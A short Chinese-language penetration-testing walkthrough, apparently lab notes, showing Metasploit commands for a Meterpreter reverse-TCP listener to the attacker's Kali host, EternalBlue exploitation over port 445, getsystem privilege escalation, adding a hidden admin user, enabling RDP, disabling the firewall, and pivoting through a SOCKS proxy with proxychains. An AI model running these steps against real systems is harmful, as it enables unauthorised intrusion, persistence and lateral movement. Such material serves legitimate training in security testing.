我们首先打开webshell工具
然后切换到C盘的www的文件夹下面
然后我们打开MSF工具进行监听
模板
msfconsole 启动MSF工具
然后是 use exploit/multi/handler 使用漏洞辅助模块
set payload windows/meterpreter/reverse_tcp 这是利用漏洞tcp回弹模块
set lhost 192.168.52.129 这是设置回弹的主机 这里是我们的kali攻击机的ip地址
set lport 12345 这里是设置监听的端口
run 是运行
权限反弹
我们首先先对内网的用户的主机进行扫描
我们看到了如下的开放端口
445 永恒之蓝
打开MSF工具
用永恒之蓝漏洞拿到了权限
现在我们应该进一步获得一些权限
我们首先给那台机器添加一个新用户
然后赋予它管理员权限
让我们开启3389端口以便于进行远程连接
关闭防火墙
说一下连接的问题
如果进行远程的连接
首先我们现在win7服务器中获得权限
当我们通过 meterpreter 界面的话
我们要先输入 getuid 是查看服务器的权限
用getsystem进行提权
提权以后用MSF工具进行端口连接
用MSF进行连接
首先是用
usae auxiliary/server/socks_proxy
set version 4a
set srvport 2222
run 建立了连接
然后我们还需要进入 vi etc/proxychains4.conf
将里面的连接配置进行更改
然后通过proxychains进行配置连接
然后就可以进行远程的计算机连接了
通过漏洞添加目标机用户,和为用户设置管理员权限、
然后打开对面3389端口,关闭对方防火墙均可以实现
